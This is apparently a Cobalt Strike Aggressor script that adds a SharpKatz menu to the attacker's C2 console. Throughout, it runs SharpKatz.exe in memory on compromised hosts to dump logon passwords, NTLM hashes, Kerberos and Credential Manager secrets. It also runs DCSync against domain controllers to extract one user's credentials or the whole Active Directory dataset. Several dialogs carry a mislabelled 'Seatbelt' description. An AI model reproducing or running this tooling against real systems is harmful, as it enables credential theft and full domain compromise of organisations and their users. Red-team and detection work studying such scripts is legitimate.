#################################################

#   SharpKatz Menu

#################################################

menu "SharpKatz"{
# SharpKatz Debug Privilege
item "SharpKatz Logon Passwords  - T1003"{
	local('$bid');
		foreach $bid ($1){
			sklogonpasswords($bid);
		}
	}
item "SharpKatz WDigest Credentials  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skwdigest($bid);
		}
	}
item "SharpKatz Kerberos Credentials  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skkerberos($bid);
		}
	}
item "SharpKatz MSV LM & NTLM Passwords  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skmsv($bid);
		}
	}
item "SharpKatz TsPkg Passwords  - T1003"{
	local('$bid');
		foreach $bid ($1){
			sktspkg($bid);
		}
	}
item "SharpKatz ekeys  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skekeys($bid);
		}
	}
item "SharpKatz Credential Manager  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skcredman($bid);
		}
	}
item "SharpKatz Dump User Credential By Username  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skdcsyncusername($bid);
		}
	}
item "SharpKatz Dump User Credential By GUID - T1003"{
	local('$bid');
		foreach $bid ($1){
			skdcsyncguid($bid);
		}
	}
item "SharpKatz Export Entire Dataset From AD  - T1003"{
	local('$bid');
		foreach $bid ($1){
			skdcsyncdataset($bid);
		}
	}

}
#################################################

#   SharpKatz Functions

#################################################

sub sklogonpasswords{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command logonpasswords");

}


sub skwdigest{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command wdigest");

}


sub skkerberos{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command kerberos");

}


sub skmsv{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command msv");

}


sub sktspkg{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command tspkg");

}


sub skekeys{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command ekeys");

}


sub skcredman{

bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command credman");

}

sub skdcsyncusername{
 $bid = $1;
    $dialog = dialog("SharpKatz Dump Credential By Username", %(username => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        $cmdargs = "";
        $cmdargs = "--Command dcsync --User $3['username'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }));
    dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt");
    drow_text($dialog, "username",  "Please Enter the username:");
    drow_text($dialog, "fqdn",  "Please Enter the FQDN:");
    drow_text($dialog, "dc",  "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);

}

sub skdcsyncguid{
 $bid = $1;
    $dialog = dialog("SharpKatz Dump Credential By GUID", %(guid => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        $cmdargs = "";
        $cmdargs = "--Command dcsync --Guid $3['guid'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }));
    dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt");
    drow_text($dialog, "guid",  "Please Enter A GUID:");
    drow_text($dialog, "fqdn",  "Please Enter the FQDN:");
    drow_text($dialog, "dc",  "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);

}

sub skdcsyncdataset{
 $bid = $1;
    $dialog = dialog("SharpKatz Dump Entire Dataset From AD", %(fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({
        $cmdargs = "";
        $cmdargs = "--Command dcsync --Domain $3['fqdn'] --DomainController $3['dc'] /ptt";
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Dumping Creds...');
            bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs);
        }
    }));
    dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt");
    drow_text($dialog, "fqdn",  "Please Enter the FQDN:");
    drow_text($dialog, "dc",  "Please Enter the FQDN of the Domain Controller:");
    dbutton_action($dialog, "Execute");
    dialog_show($dialog);

}		